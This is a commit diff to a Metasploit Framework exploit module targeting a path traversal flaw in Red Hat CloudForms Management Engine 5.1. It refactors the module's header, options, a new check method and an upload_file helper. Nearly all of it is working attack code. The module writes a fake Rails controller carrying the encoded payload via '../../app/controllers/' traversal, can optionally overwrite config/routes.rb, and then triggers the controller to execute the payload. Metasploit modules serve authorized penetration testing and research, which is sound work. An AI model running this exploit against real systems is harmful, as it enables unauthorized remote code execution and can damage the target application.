Ramon de C Valle
commit
819236c6ec
|
|
@ -1,8 +1,6 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
|
@ -15,10 +13,10 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
super(
|
||||
'Name' => 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal',
|
||||
'Description' => %q{
|
||||
This module exploits a path traversal vulnerability in the "linuxpkgs"
|
||||
This module exploits a path traversal vulnerability in the "linuxpkgs"
|
||||
action of "agent" controller of the Red Hat CloudForms Management Engine 5.1
|
||||
(ManageIQ Enterprise Virtualization Manager 5.0 and earlier).
|
||||
It uploads a fake controller to the controllers directory of the Rails
|
||||
It uploads a fake controller to the controllers directory of the Rails
|
||||
application with the encoded payload as an action and sends a request to
|
||||
this action to execute the payload. Optionally, it can also upload a routing
|
||||
file containing a route to the action. (Which is not necessary, since the
|
||||
|
|
@ -40,33 +38,52 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
['Automatic', {}]
|
||||
],
|
||||
'DisclosureDate' => 'Sep 4 2013',
|
||||
'DefaultOptions' => { 'PrependFork' => true },
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'PrependFork' => true,
|
||||
'SSL' => true
|
||||
},
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(443),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
OptBool.new('ROUTES', [true, 'Upload a routing file', false]),
|
||||
OptString.new('CONTROLLER', [false, 'The name of the controller']),
|
||||
OptString.new('ACTION', [false, 'The name of the action']),
|
||||
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
|
||||
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
|
||||
], self.class
|
||||
)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('ROUTES', [true, 'Upload a routing file. Warning: It is not necessary by default and can damage the target application', false]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "ping.html")
|
||||
)
|
||||
|
||||
if res and res.code == 200 and res.body.to_s =~ /EVM ping response/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
controller =
|
||||
if datastore['CONTROLLER'].nil? || datastore['CONTROLLER'].empty?
|
||||
if datastore['CONTROLLER'].blank?
|
||||
Rex::Text.rand_text_alpha_lower(rand(9) + 3)
|
||||
else
|
||||
datastore['CONTROLLER'].downcase
|
||||
end
|
||||
|
||||
action =
|
||||
if datastore['ACTION'].nil? || datastore['ACTION'].empty?
|
||||
if datastore['ACTION'].blank?
|
||||
Rex::Text.rand_text_alpha_lower(rand(9) + 3)
|
||||
else
|
||||
datastore['ACTION'].downcase
|
||||
|
|
@ -75,33 +92,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
data = "class #{controller.capitalize}Controller < ApplicationController; def #{action}; #{payload.encoded}; render :nothing => true; end; end\n"
|
||||
|
||||
print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...")
|
||||
res = send_request_cgi(
|
||||
'method' => datastore['HTTP_METHOD'],
|
||||
'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'),
|
||||
"vars_#{datastore['HTTP_METHOD'].downcase}" => {
|
||||
'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)),
|
||||
'filename' => "../../app/controllers/#{controller}_controller.rb",
|
||||
'md5' => Rex::Text.md5(data)
|
||||
}
|
||||
)
|
||||
res = upload_file("../../app/controllers/#{controller}_controller.rb", data)
|
||||
|
||||
fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
|
||||
fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500
|
||||
|
||||
if datastore['ROUTES']
|
||||
data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n"
|
||||
|
||||
print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...")
|
||||
res = send_request_cgi(
|
||||
'method' => datastore['HTTP_METHOD'],
|
||||
'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'),
|
||||
"vars_#{datastore['HTTP_METHOD'].downcase}" => {
|
||||
'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)),
|
||||
'filename' => '../../config/routes.rb',
|
||||
'md5' => Rex::Text.md5(data)
|
||||
}
|
||||
)
|
||||
|
||||
fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
|
||||
res = upload_file("../../config/routes.rb", data)
|
||||
fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500
|
||||
end
|
||||
|
||||
print_status("Sending execute request to #{target_url(controller, action)}...")
|
||||
|
|
@ -109,8 +109,20 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, controller, action)
|
||||
)
|
||||
end
|
||||
|
||||
handler
|
||||
def upload_file(filename, data)
|
||||
res = send_request_cgi(
|
||||
'method' => datastore['HTTP_METHOD'],
|
||||
'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'),
|
||||
"vars_#{datastore['HTTP_METHOD'].downcase}" => {
|
||||
'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)),
|
||||
'filename' => filename,
|
||||
'md5' => Rex::Text.md5(data)
|
||||
}
|
||||
)
|
||||
|
||||
return res
|
||||
end
|
||||
|
||||
def target_url(*args)
|
||||
|
|
|
|||
Loading…
Reference in New Issue